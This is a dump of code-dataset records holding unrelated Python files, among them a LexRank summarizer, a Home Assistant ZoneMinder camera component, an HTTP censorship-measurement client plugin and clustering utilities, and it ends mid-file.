self._filename('inp'))\n\n def check(self):\n \"\"\"\n Look for the normal termination signal in Orca output\n \"\"\"\n s = self.results.grep_output(\"ORCA TERMINATED NORMALLY\")\n return len(s) > 0\n\n","sub_path":"plams_original/orcajob.py","file_name":"orcajob.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"410665325","text":"#\n# Copyright (C) 2018 ETH Zurich and University of Bologna\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n# Authors: Germain Haugou, ETH (germain.haugou@iis.ee.ethz.ch)\n\nimport json\nimport plptree\nimport os\nfrom collections import OrderedDict\n\n\nclass Interface(object):\n\n def __init__(self, comp, name):\n self.__dict__['name'] = name\n self.__dict__['comp'] = comp\n\n\n\nclass Component(object):\n\n def __init__(self, **kwargs):\n self.__dict__['is_empty'] = False\n self.__dict__['is_tb_comp'] = False\n\n self.__dict__['_Component__comps'] = OrderedDict()\n self.__dict__['_Component__master_itfs'] = OrderedDict()\n self.__dict__['_Component__slave_itfs'] = OrderedDict()\n\n if len(kwargs) != 0:\n self.__dict__['_Component__properties'] = kwargs.copy()\n\n def get_master_itfs(self):\n return self.__dict__['_Component__master_itfs']\n\n def get_slave_itfs(self):\n return self.__dict__['_Component__slave_itfs']\n\n def set_name(self, name):\n self.__dict__['_Component__name'] = name\n\n def get_name(self):\n return self.__dict__.get('_Component__name')\n\n def get_json_config(self, configs=None, expand=False):\n if not expand:\n return json.dumps(self.gen(), indent=' ')\n\n\n config = plptree.get_config_tree_from_dict(self.gen(), path=configs)\n return config.get_string()\n\n\n def __setattr__(self, name, 
value):\n if type(value) == Interface:\n if self.__dict__['_Component__master_itfs'].get(name) is None:\n self.__dict__['_Component__master_itfs'][name] = []\n\n self.__dict__['_Component__master_itfs'][name].append(value)\n else:\n self.__dict__['_Component__comps'][name] = value\n self.__dict__[name] = value\n value.set_name(name)\n\n def __getattr__(self, name):\n if self.__dict__.get(name) is None:\n itf = Interface(self, name)\n self.__dict__['_Component__slave_itfs'][name] = itf\n return itf\n else:\n return self.__dict__[name]\n\n def get_property(self, name):\n return self.__dict__.get('_Component__properties').get(name)\n\n def set_property(self, name, value):\n if self.__dict__.get('_Component__properties') is None:\n self.__dict__['_Component__properties'] = OrderedDict()\n self.__dict__.get('_Component__properties')[name] = value\n\n def get_comp(self, name):\n comp = self.__dict__.get('_Component__vp_comps').get(name)\n if comp is None:\n comp = self.__dict__.get('_Component__tb_comps').get(name)\n return comp\n\n def gen(self):\n result = OrderedDict()\n\n properties = self.__dict__.get('_Component__properties')\n if properties is not None:\n for key, value in properties.items():\n result[key] = value\n\n comps = list(self.__dict__['_Component__comps'])\n if len(comps) != 0:\n vp_comps = []\n tb_comps = []\n for comp_name in comps:\n comp = self.__dict__['_Component__comps'].get(comp_name)\n if comp.__dict__.get('is_empty'):\n continue\n\n if comp.__dict__.get('is_tb_comp'):\n tb_comps.append(comp_name)\n else:\n vp_comps.append(comp_name)\n\n if len(vp_comps) != 0:\n result['vp_comps'] = vp_comps\n if len(tb_comps) != 0:\n result['tb_comps'] = tb_comps\n\n vp_bindings = []\n tb_bindings = []\n\n ports = list(self.get_master_itfs().keys()) + list(self.get_slave_itfs().keys())\n if len(ports) != 0:\n result['vp_ports'] = ports \n\n for itf_name, slave_itf_list in self.get_master_itfs().items():\n for slave_itf in slave_itf_list:\n slave_name = slave_itf.comp.get_name()\n\n if self.__dict__.get('_Component__comps').get(slave_name) != slave_itf.comp:\n continue\n binding = [\n \"self->%s\" % (itf_name),\n \"%s->%s\" % (slave_name, slave_itf.name)\n ]\n\n if slave_itf.comp.__dict__.get('is_tb_comp') or self.__dict__.get('is_tb_comp'):\n tb_bindings.append(binding)\n else:\n vp_bindings.append(binding)\n\n for comp_name, comp in self.__dict__['_Component__comps'].items():\n for itf_name, slave_itf_name in comp.get_master_itfs().items():\n for slave_itf in slave_itf_name:\n if slave_itf.comp == self:\n slave_name = 'self'\n else:\n slave_name = slave_itf.comp.get_name()\n\n if self.__dict__.get('_Component__comps').get(slave_name) != slave_itf.comp:\n continue\n\n binding = [\n \"%s->%s\" % (comp_name, itf_name),\n \"%s->%s\" % (slave_name, slave_itf.name)\n ]\n\n if slave_itf.comp.__dict__.get('is_tb_comp') or comp.__dict__.get('is_tb_comp'):\n tb_bindings.append(binding)\n else:\n vp_bindings.append(binding)\n\n\n if len(vp_bindings) != 0:\n result['vp_bindings'] = vp_bindings\n\n if len(tb_bindings) != 0:\n result['tb_bindings'] = tb_bindings\n\n for name, comp in self.__dict__['_Component__comps'].items():\n result[name] = comp.gen()\n\n return result\n\n\n\nclass Tb_Component(Component):\n def __init__(self, **kwargs):\n super(Tb_Component, self).__init__(**kwargs)\n\n self.__dict__['is_tb_comp'] = True\n\nclass Empty_Component(Component):\n def __init__(self, **kwargs):\n super(Empty_Component, self).__init__(**kwargs)\n\n self.__dict__['is_empty'] = 
True\n","sub_path":"generators/comp_gen.py","file_name":"comp_gen.py","file_ext":"py","file_size_in_byte":6503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"513622342","text":"\"\"\"Lex Rank.\"\"\"\nfrom lex_rank_utils import LexRankCompute\nfrom utils import preprocess\nimport itertools\nimport numpy as np\nimport math\n\n\ndef cosine(A, B):\n \"\"\"Cosine Similarity.\"\"\"\n A = np.array(A)\n B = np.array(B)\n dot = (A*B).sum()\n mod_A = math.sqrt((A * A).sum())\n mod_B = math.sqrt((B * B).sum())\n\n return dot/(mod_A * mod_B)\n\n\nclass LexRank():\n \"\"\"Class for Lex Rank.\"\"\"\n\n def __init__(self, name):\n \"\"\"Init.\"\"\"\n self.content = open(name, 'r').read().split('.')\n self.sent = dict()\n\n def lex_rank(self):\n \"\"\"Do LexRank.\"\"\"\n tokens_sent = list()\n raw_sent = dict()\n for i, each in enumerate(self.content):\n sent = preprocess(each)\n tokens_sent.append(sent)\n raw_sent[i] = each\n\n all_tokens = itertools.chain.from_iterable(tokens_sent)\n word_to_id = {token: idx for idx, token in enumerate(set(all_tokens))}\n\n tokens_ids = []\n for sent in tokens_sent:\n vec = [0 for i in range(len(word_to_id))]\n for tok in sent:\n vec[word_to_id[tok]] = 1\n tokens_ids.append(vec)\n\n lmatrix = np.zeros((len(tokens_ids), len(tokens_ids)), dtype=np.float)\n\n for i in range(len(tokens_ids)):\n for j in range(len(tokens_ids)):\n sent1 = tokens_ids[i]\n sent2 = tokens_ids[j]\n if i != j:\n lmatrix[i][j] = cosine(sent1, sent2)\n\n P = LexRankCompute(lmatrix.shape[0], lmatrix)\n P.iterate(1)\n\n sorte = [i[0] for i in sorted(enumerate(P.page_scores), key=lambda x:x[1], reverse=True)]\n print(P.page_scores, sorte)\n\n text = raw_sent[sorte[0]].strip() + raw_sent[sorte[1]].strip() + '\\n'\n\n return text\n\n\ndef main():\n \"\"\"Main.\"\"\"\n l = LexRank('text.txt')\n summary = l.lex_rank()\n print(summary)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"lex_rank/lexrank.py","file_name":"lexrank.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"636315932","text":"#!/usr/bin/env python3\n# Script for printing and counting presence of specific JSON fields from given file\nimport json\nimport argparse\nfrom pathlib import Path\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"input\", help=\"the input file\")\nparser.add_argument(\"fieldname\", help=\"Field name (root level)\")\nparser.add_argument(\"-s\", \"--silent\", help=\"Don't print the found fields\", action=\"store_true\")\nargs = parser.parse_args()\nif not Path(args.input).is_file():\n msg = \"{0} is not an existing file\".format(args.input)\n raise argparse.ArgumentTypeError(msg)\n\ninput_file = Path(args.input)\n\ntotal_count = 0\npresent_count = 0\nfor element in input_file.open():\n total_count += 1\n json_element = json.loads(element)\n try:\n # print JSON element(s), if present\n if not args.silent:\n print(str(json_element[args.fieldname]))\n present_count += 1\n except KeyError:\n pass\n# print statistics\nprint('Given field: ' + args.fieldname)\nprint('Given field present in: ' + str(present_count) + '/' + str(total_count) + 'total')\nprint('Given field missing: ' + str(total_count - present_count))\n","sub_path":"debugscripts/analyse-json-file.py","file_name":"analyse-json-file.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} 
+{"seq_id":"468689408","text":"class Home:\n\n def __init__(self, new_area, new_address):\n self.area = new_area\n self.left_area = new_area\n self.address = new_address\n self.contained_items = [] # 用来保存家具\n\n def __str__(self):\n\n item_names = []\n for temp in self.contained_items:\n item_names.append(temp.name)\n\n return \"房子的总面积是:%d, 剩余可用面积是:%d, 位置是:%s, 物品有:%s\" % (self.area, self.left_area, self.address, str(item_names))\n\n def add_item(self, new_item):\n if self.left_area > new_item.area:\n self.contained_items.append(new_item)\n self.left_area -= new_item.area\n else:\n print(\"物品过大,放不下,请重新购买\")\n\n\nclass Bed:\n\n def __init__(self, new_name, new_area):\n self.name = new_name\n self.area = new_area\n\n\nhome1 = Home(130, \"北京市 朝阳区 长安街 666号\")\nprint(home1)\n\nbed1 = Bed(\"双人床\", 4)\n\nhome1.add_item(bed1)\n\nprint(home1)\n\nbed2 = Bed(\"婴儿床\", 1.5)\n\nhome1.add_item(bed2)\n\nprint(home1)\n\nbed3 = Bed(\"多人床\", 180)\n\nhome1.add_item(bed3)\n\nprint(home1)\n","sub_path":"课件/python10/12-应用:存放家具.py","file_name":"12-应用:存放家具.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"198958034","text":"\n\n#calss header\nclass _BALCONY():\n\tdef __init__(self,): \n\t\tself.name = \"BALCONY\"\n\t\tself.definitions = [u'an area with a wall or bars around it that is joined to the outside wall of a building on an upper level: ', u'an area of seats at an upper level in a theatre: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_balcony.py","file_name":"_balcony.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"56763502","text":"import tkinter as tk\nfrom tkinter import ttk\n\nclass Main(tk.Frame):\n def __init__(self, root):\n super().__init__(root)\n self.init_main()\n\n def init_main(self):\n labelSplav = tk.Label(root, text='Выберите сплав:')\n labelSplav.pack(side=tk.TOP)\n\n comboSplav = ttk.Combobox(root, values=['бронза', 'латунь', 'оцс', 'припой'], state='readonly')\n comboSplav.pack(side=tk.TOP)\n\n labelMarkaSplava = tk.Label(root, text='Выберите марку сплава:')\n labelMarkaSplava.pack(side=tk.TOP)\n\n comboSplav = ttk.Combobox(root, values=['Л63', 'ЛС59-1'], state='readonly')\n comboSplav.pack(side=tk.TOP)\n\n self.tree = ttk.Treeview(self, columns=('elements', 'cu', 'zn'), height=1, show='headings')\n\n self.tree.column('elements', width=150, anchor=tk.CENTER)\n self.tree.column('cu', width=150, anchor=tk.CENTER)\n self.tree.column('zn', width=150, anchor=tk.CENTER)\n\n self.tree.heading('elements', text='Химические элементы')\n self.tree.heading('cu', text='Cu')\n self.tree.heading('zn', text='Zn')\n\n self.tree.pack()\n\nif __name__ == '__main__':\n root = tk.Tk()\n app = Main(root)\n app.pack()\n root.title('Расчет металлов')\n root.geometry('800x450+300+200')\n root.resizable(False, False)\n root.mainloop()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"479944931","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 7 14:01:54 2017\n\n@author: Nakanishi\n\"\"\"\nfrom multiprocessing import Pool\nimport numpy as np\nimport matplotlib.pyplot as 
plt\n\nfrom neuron5 import Neuron\n\ndef plot(process):\n    # Each worker simulates one neuron with a different noise level and saves its plot.\n    if process == 0:\n        neu = Neuron(0.01, 120, 1, 8, -65, 100)\n        for i in range(0, int(neu.cycle)-1):\n            neu.propagation()\n        t = np.arange(0, neu.simtime, neu.timestep)\n        plt.plot(t, neu.vin[0])\n        plt.title(\"noise = 100\")\n        plt.savefig(\"noise is 100.png\")\n\n    elif process == 1:\n        neu = Neuron(0.01, 120, 1, 8, -65, 200)\n        for i in range(0, int(neu.cycle)-1):\n            neu.propagation()\n        t = np.arange(0, neu.simtime, neu.timestep)\n        plt.plot(t, neu.vin[0])\n        plt.title(\"noise = 200\")\n        plt.savefig(\"noise is 200.png\")\n\n    elif process == 2:\n        neu = Neuron(0.01, 120, 1, 8, -65, 300)\n        for i in range(0, int(neu.cycle)-1):\n            neu.propagation()\n        t = np.arange(0, neu.simtime, neu.timestep)\n        plt.plot(t, neu.vin[0])\n        plt.title(\"noise = 300\")\n        plt.savefig(\"noise is 300.png\")\n\n    elif process == 3:\n        neu = Neuron(0.01, 120, 1, 8, -65, 400)\n        for i in range(0, int(neu.cycle)-1):\n            neu.propagation()\n        t = np.arange(0, neu.simtime, neu.timestep)\n        plt.plot(t, neu.vin[0])\n        plt.title(\"noise = 400\")\n        plt.savefig(\"noise is 400.png\")\n\n    else:\n        print('miss')\n\n\ndef main():\n\n    process = 4  # number of worker processes (CPU cores)\n    p = Pool(process)\n    p.map(plot, range(process))\n    p.close()\n\n\nif __name__=='__main__':\n    main()\n","sub_path":"HH-multi/main5.py","file_name":"main5.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"462072556","text":"import nltk\n\nfrom models.search_engine import SearchEngine\nfrom models.query import Query\n\n\ndef main():\n    stopwords = nltk.corpus.stopwords.words(\"english\")\n    lemmatizer = nltk.stem.WordNetLemmatizer()\n    search_engine = SearchEngine(\"cs276\", [], lemmatizer)\n    while True:\n        str_query = input(\"enter your query: \")\n        query = Query(str_query.lower(), [], lemmatizer)\n        if query.length:\n            results = search_engine.search(query)\n            for result in results:\n                print(result)\n            if \"n\" in input(\"retry? (y/n)\").lower():\n                break\n        else:\n            print(\"empty query, please retry\")\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"24410637","text":"\"\"\" Compiled: 2020-09-18 10:38:54 \"\"\"\n\n#__src_file__ = \"extensions/SalesTrading/./etc/FSalesActivityUtils.py\"\n\"\"\"-------------------------------------------------------------------------------------------------------\nMODULE\n    FSalesActivityUtils\n\n    (c) Copyright 2014 SunGard FRONT ARENA. 
All rights reserved.\n\nDESCRIPTION\n A collection of utility functions used by Sales Activity.\n-------------------------------------------------------------------------------------------------------\"\"\"\n\nimport math\nimport datetime\nimport acm\nimport FSheetUtils\n\ndef double(number):\n value = acm.GetFunction('double', 1)(number)\n if math.isnan(value):\n return 0\n return value\n \ndef FXRateIsValid(ins):\n try:\n curr1 = ins.Currency()\n curr2 = ins.Underlying().Currency()\n pairName = '/'.join((curr1.Name(), curr2.Name()))\n return bool(acm.FCurrencyPair.Select01('name=%s' % pairName, None))\n except AttributeError:\n return False\n\ndef FXRateLabel(ins):\n try:\n curr1 = ins.Currency()\n curr2 = ins.Underlying().Currency()\n return '/'.join((curr1.Name(), curr2.Name()))\n except Exception:\n return ''\n\ndef FXRateValue(ins, fxRate):\n if FXRateIsValid(ins):\n try:\n return 1/fxRate\n except Exception:\n return 0.0\n return fxRate\n \ndef GetFXRateFormatted(salesActivity):\n return FXRateValue(\n salesActivity.Instrument(),\n salesActivity.FXRate()\n )\n \ndef SetFXRateFormatted(salesActivity, fxRate):\n fxRateValue = FXRateValue(salesActivity.Instrument(), fxRate)\n salesActivity.FXRate(fxRateValue)\n \ndef GetEvaluator(obj, attr):\n ctx = acm.GetDefaultContext()\n tag = acm.GetGlobalEBTag()\n return acm.GetCalculatedValueFromString(\n obj, ctx, attr, tag)\n\ndef GetCalculatedValue(obj, attr):\n try:\n return GetEvaluator(obj, attr).Value()\n except RuntimeError:\n return 0\n \ndef GetMarketMakingValue(orderBook, columnId):\n try:\n ctx = acm.GetDefaultContext()\n quoteCtx = acm.MarketMaking.CreateQuoteContext(ctx)\n quoteData = quoteCtx.Insert(acm.FQuoteController(orderBook))\n value = quoteData.GetDataSource(columnId, 0).Get()\n quoteCtx.Clear()\n return value\n except RuntimeError:\n return 0\n \ndef ProposedBidPrice(ins):\n try:\n orderbook = FSheetUtils.OrderBook(ins)\n if orderbook is None:\n return double(GetCalculatedValue(ins, 'pricingPriceFeed'\n ).BestBidPrice().Get())\n return GetMarketMakingValue(orderbook, 'Proposed Bid Price Raw')\n except AttributeError:\n return 0\n \ndef ProposedAskPrice(ins):\n try:\n orderbook = FSheetUtils.OrderBook(ins)\n if orderbook is None:\n return double(GetCalculatedValue(ins, 'pricingPriceFeed'\n ).BestAskPrice().Get())\n return GetMarketMakingValue(orderbook, 'Proposed Bid Price Raw')\n except AttributeError:\n return 0\n \ndef IsValidNumber(number):\n try:\n if number.IsKindOf(acm.FDenominatedValue):\n number = double(number)\n except AttributeError:\n pass\n return (type(number) in (int, float, long) and\n not math.isnan(number) and\n not math.isinf(number))\n \ndef IndexedDiary(diary):\n def IsValidKey(d):\n try:\n datetime.datetime.strptime(d, \n '%Y-%m-%d %H:%M:%S')\n return True\n except ValueError:\n return False\n\n d = {}\n key = None\n try:\n for line in diary.Text().splitlines():\n if line: \n _key = line[:19]\n if IsValidKey(_key):\n key = _key\n d[key] = []\n elif key in d:\n d[key].append(line)\n except AttributeError:\n pass\n\n return d\n \ndef LastDiaryEntry(diary):\n try:\n d = IndexedDiary(diary)\n return ' '.join(d[sorted(d.keys())[-1]])\n except IndexError:\n pass\n","sub_path":"Extensions/_sales_trading_py/FPythonCode/FSalesActivityUtils.py","file_name":"FSalesActivityUtils.py","file_ext":"py","file_size_in_byte":4083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"579067746","text":"\"\"\"Support for ZoneMinder camera streaming.\"\"\"\nimport 
logging\nfrom typing import Callable, List, Optional\n\nfrom zoneminder.monitor import Monitor\n\nfrom homeassistant.components.mjpeg.camera import (\n CONF_MJPEG_URL,\n CONF_STILL_IMAGE_URL,\n MjpegCamera,\n filter_urllib3_logging,\n)\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import CONF_NAME, CONF_VERIFY_SSL\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.entity import Entity\n\nfrom .common import get_client_from_data\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef setup_platform(hass, config, add_entities, discovery_info=None):\n \"\"\"Set up the ZoneMinder cameras.\"\"\"\n filter_urllib3_logging()\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n config_entry: ConfigEntry,\n async_add_entities: Callable[[List[Entity], Optional[bool]], None],\n) -> None:\n \"\"\"Set up the sensor config entry.\"\"\"\n zm_client = get_client_from_data(hass, config_entry.unique_id)\n\n async_add_entities(\n [\n ZoneMinderCamera(monitor, zm_client.verify_ssl, config_entry)\n for monitor in await hass.async_add_job(zm_client.get_monitors)\n ]\n )\n\n\nclass ZoneMinderCamera(MjpegCamera):\n \"\"\"Representation of a ZoneMinder Monitor Stream.\"\"\"\n\n def __init__(self, monitor: Monitor, verify_ssl: bool, config_entry: ConfigEntry):\n \"\"\"Initialize as a subclass of MjpegCamera.\"\"\"\n device_info = {\n CONF_NAME: monitor.name,\n CONF_MJPEG_URL: monitor.mjpeg_image_url,\n CONF_STILL_IMAGE_URL: monitor.still_image_url,\n CONF_VERIFY_SSL: verify_ssl,\n }\n super().__init__(device_info)\n self._is_recording = None\n self._is_available = None\n self._monitor = monitor\n self._config_entry = config_entry\n\n @property\n def unique_id(self) -> Optional[str]:\n \"\"\"Return a unique ID.\"\"\"\n return f\"{self._config_entry.unique_id}_{self._monitor.id}_camera\"\n\n @property\n def should_poll(self):\n \"\"\"Update the recording state periodically.\"\"\"\n return True\n\n def update(self):\n \"\"\"Update our recording state from the ZM API.\"\"\"\n _LOGGER.debug(\"Updating camera state for monitor %i\", self._monitor.id)\n self._is_recording = self._monitor.is_recording\n self._is_available = self._monitor.is_available\n\n @property\n def is_recording(self):\n \"\"\"Return whether the monitor is in alarm mode.\"\"\"\n return self._is_recording\n\n @property\n def available(self):\n \"\"\"Return True if entity is available.\"\"\"\n return self._is_available\n","sub_path":"homeassistant/components/zoneminder/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"216836460","text":"\"\"\"\nRun by the evaluator, tries to make a GET request to a given server\n\"\"\"\n\nimport argparse\nimport logging\nimport os\nimport random\nimport socket\nimport sys\nimport time\nimport traceback\nimport urllib.request\n\nimport requests\n\nsocket.setdefaulttimeout(1)\n\nimport external_sites\nimport actions.utils\n\nfrom plugins.plugin_client import ClientPlugin\n\nBASEPATH = os.path.dirname(os.path.abspath(__file__))\n\ncorrect_response = \"\"\"\n\n\n\nDirectory listing for /?q=ultrasurf\n\n\n
\nDirectory listing for /?q=ultrasurf\n\n\n\n\n\n    \n\n\n
\n\n\n\"\"\"\n\nclass HTTPClient(ClientPlugin):\n \"\"\"\n Defines the HTTP client.\n \"\"\"\n name = \"http\"\n\n def __init__(self, args):\n \"\"\"\n Initializes the HTTP client.\n \"\"\"\n ClientPlugin.__init__(self)\n self.args = args\n\n @staticmethod\n def get_args(command):\n \"\"\"\n Defines required args for this plugin\n \"\"\"\n super_args = ClientPlugin.get_args(command)\n parser = argparse.ArgumentParser(description='HTTP Client', prog=\"http/client.py\")\n\n parser.add_argument('--host-header', action='store', default=\"\", help='specifies host header for HTTP request')\n parser.add_argument('--injected-http-contains', action='store', default=\"\", help='checks if injected http response contains string')\n\n args, _ = parser.parse_known_args(command)\n args = vars(args)\n\n super_args.update(args)\n return super_args\n\n def run(self, args, logger, engine=None):\n \"\"\"\n Try to make a forbidden GET request to the server.\n \"\"\"\n logger.debug(\"STARTING HTTP CLIENT....\")\n fitness = 0\n url = args.get(\"server\", \"\")\n assert url, \"Cannot launch HTTP test with no server\"\n if not url.startswith(\"http://\"):\n url = \"http://\" + url\n headers = {}\n if args.get('host_header'):\n headers[\"Host\"] = args.get('host_header')\n\n # If we've been given a non-standard port, append that to the URL\n port = args.get(\"port\", 80)\n if port != 80:\n url += \":%s\" % str(port)\n\n if args.get(\"bad_word\"):\n url += \"?q=%s\" % args.get(\"bad_word\")\n\n injected_http = args.get(\"injected_http_contains\")\n try:\n # res = requests.get(url, allow_redirects=False, timeout=600, headers=headers)\n req = requests.Request('GET', url).prepare()\n req.headers = headers\n req.method = 'GET'\n s = requests.Session()\n res = s.send(req, timeout=3)\n logger.debug(res.text)\n # If we need to monitor for an injected response, check that here\n if injected_http and injected_http in res.text:\n fitness -= 90\n else:\n if res.text == correct_response:\n fitness += 100\n else:\n fitness -= 90\n except requests.exceptions.ConnectTimeout as exc:\n logger.exception(\"Socket timeout.\")\n fitness -= 100\n except (requests.exceptions.ConnectionError, ConnectionResetError) as exc:\n logger.exception(\"Connection RST.\")\n fitness -= 90\n except urllib.error.URLError as exc:\n logger.debug(exc)\n fitness += -101\n # Timeouts generally mean the strategy killed the TCP stream.\n # HTTPError usually mean the request was destroyed.\n # Punish this more harshly than getting caught by the censor.\n except (requests.exceptions.Timeout, requests.exceptions.HTTPError) as exc:\n logger.debug(exc)\n logger.debug(\"OH NO! TIMEOUT OR HTTP ERROR!\")\n fitness += -120\n except Exception:\n logger.exception(\"Exception caught in HTTP test to site %s.\", url)\n fitness += -100\n return fitness * 4\n","sub_path":"plugins/http/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"267095765","text":"# Anotated Gigawords:\nroot = \"/home/dataset\"\ntrain_data_path = \troot + \"data/chunked/train/train_*\"\nvalid_data_path = \troot + \"data/chunked/valid/valid_*\"\ntest_data_path = \troot + \"data/chunked/test/test_*\"\nvocab_path = \t\troot + \"data/vocab\"\nsave_model_path = root + \"data/saved_models/Attn\"\n\n# Hyperparameters\nvocab_size = 100000 # Take most frequent vocab_size words. 
\nemb_dim = 300 # Dimension of Word Embedding.\nnum_of_predefined_words = 4 # [PAD], [UNK], [START], [STOP]\nbatch_size = 200 # mini-batch size.\nhidden_dim = 256 # number of units for LSTM.\ndiv_factor = 1000 # Divide remain length by 1000 to adjust the scope.\nlr = 0.001 # learning rate.\nmin_dec_steps = 3\n\nmax_enc_steps = 55\t\t # 99% of the articles are within length 55.\nmax_dec_steps = 30\t\t # 99% of the titles are within length 15.\nmax_word_len = 250 # \\Aleph used in LA.\n\n# Eval settings:\nbeam_size = 4 # Beam search size.\n\n# RL \n# -------------\nrl_reward_ratio = 10 # divide rl reward by 10 to match ROUGE score's scope.\nrl_len_reward_diff = 4 # reward the RL if len_diff is not bigger than 70.\neps = 1e-12\neps_denominator = 1e-11\n# -------------\n\nrand_unif_init_mag = 0.02 \ntrunc_norm_init_std = 1e-4\n\nmax_iterations = 50000 # Total iteration number.\nsave_model_checkpoint = 10000 # Every 10000 iterations, saves model parameters and infos.\nshow_train_message = 1000 # Every 1000 iterations, display training information.\nintra_encoder = True # Use intra_encoder Attention.\nintra_decoder = True # Use intra_decoder Attention.\nprint_eval_msg = False # Save evaluation message to files.\nDEBUG = False # For Debug.\nglove = True # Use glove\ncnndm = False\ngigawords = True\nlen_attn_visualization = False\ncount_space = False\n","sub_path":"LA_Atten/data_util/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"30933220","text":"import random\r\nimport csv\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n# Split the dataset in two: a training set and a test set. A seed can be supplied if desired\r\ndef split_dataset(data, split_ratio, seed=random.randint(0,9)):\r\n\trandom.seed(seed)\r\n\ttrain_size = int(len(data) * split_ratio)\r\n\ttrain_set = []\r\n\tcopy = list(data)\r\n\r\n\twhile len(train_set) < train_size:\r\n\t\tindex = random.randrange(len(copy))\r\n\t\ttrain_set.append(copy.pop(index))\r\n\treturn train_set, copy\r\n\r\n# Delete columns that are not needed\r\ndef clean_data(data, start, end):\r\n\tfor row in data:\r\n\t\tdel row[start:end]\r\n\treturn data\r\n\r\ndef plot_3d_clusters(data, clusters, outliers):\r\n\tfig = plt.figure()\r\n\tax = fig.add_subplot(111, projection='3d')\r\n\r\n\t# Lambda function for a random color \r\n\tr = lambda: random.randint(0,255)\r\n\r\n\tcolor = '#000000'\r\n\tax1 = []\r\n\tax2 = []\r\n\tax3 = []\r\n\r\n\t# Plot outliers\r\n\tfor outlier in outliers:\r\n\t\tax1.append(data[outlier][0])\r\n\t\tax2.append(data[outlier][1])\r\n\t\tax3.append(data[outlier][2])\r\n\r\n\tax.scatter(ax1, ax2, ax3, c=color, marker='+')\r\n\r\n\t# Plot each cluster in a different color\r\n\tfor cluster in clusters:\r\n\t\tcolor = ('#%02X%02X%02X' % (r(),r(),r()))\r\n\t\tax1 = []\r\n\t\tax2 = []\r\n\t\tax3 = []\r\n\t\tfor point in cluster:\r\n\t\t\tax1.append(data[point][0])\r\n\t\t\tax2.append(data[point][1])\r\n\t\t\tax3.append(data[point][2])\r\n\r\n\t\tax.scatter(ax1, ax2, ax3, c=color)\r\n\tplt.show()\r\n\r\n# Find all points that are not in any cluster\r\ndef not_in_cluster(data, in_cluster):\r\n\toutliers = []\r\n\r\n\ti = 0\r\n\tfor i in range(len(data)):\r\n\t\tif i not in in_cluster:\r\n\t\t\toutliers.append(i)\r\n\r\n\treturn outliers\r\n\r\n# Write the clusters to a text file\r\ndef clusters_to_text(clusters, filename):\r\n\tfile = open('datasets/' + str(filename)+'.txt', 
'w')\r\n\r\n\tfor cluster in clusters:\r\n\t\tfile.write('Cluster: ' + str(clusters.index(cluster)) + '\\n')\r\n\t\tfor index in cluster:\r\n\t\t\tfile.write(str(index) + '\\n') \r\n\t\tfile.write('\\n')\r\n\r\n\tfile.close()\r\n\r\n# Write the clusters and outliers to file so they can be reused later\r\ndef save_clusters_and_outliers(clusters, outliers):\r\n\tif clusters:\r\n\t\tcluster_file = open('datasets/saved_clusters.csv', 'w')\r\n\t\twriter = csv.writer(cluster_file, delimiter=',')\r\n\t\tfor cluster in clusters:\r\n\t\t\twriter.writerow(cluster)\r\n\t\tcluster_file.close()\r\n\r\n\tif outliers:\r\n\t\toutlier_file = open('datasets/saved_outliers.csv', 'w')\r\n\t\twriter = csv.writer(outlier_file, delimiter=',')\r\n\t\twriter.writerow(outliers)\r\n\t\toutlier_file.close()\r\n\r\n# Make a plot from the saved cluster and outlier files\r\ndef make_plot_from_files(data):\r\n\tcluster_file = open('datasets/saved_clusters.csv', 'r')\r\n\r\n\treader = 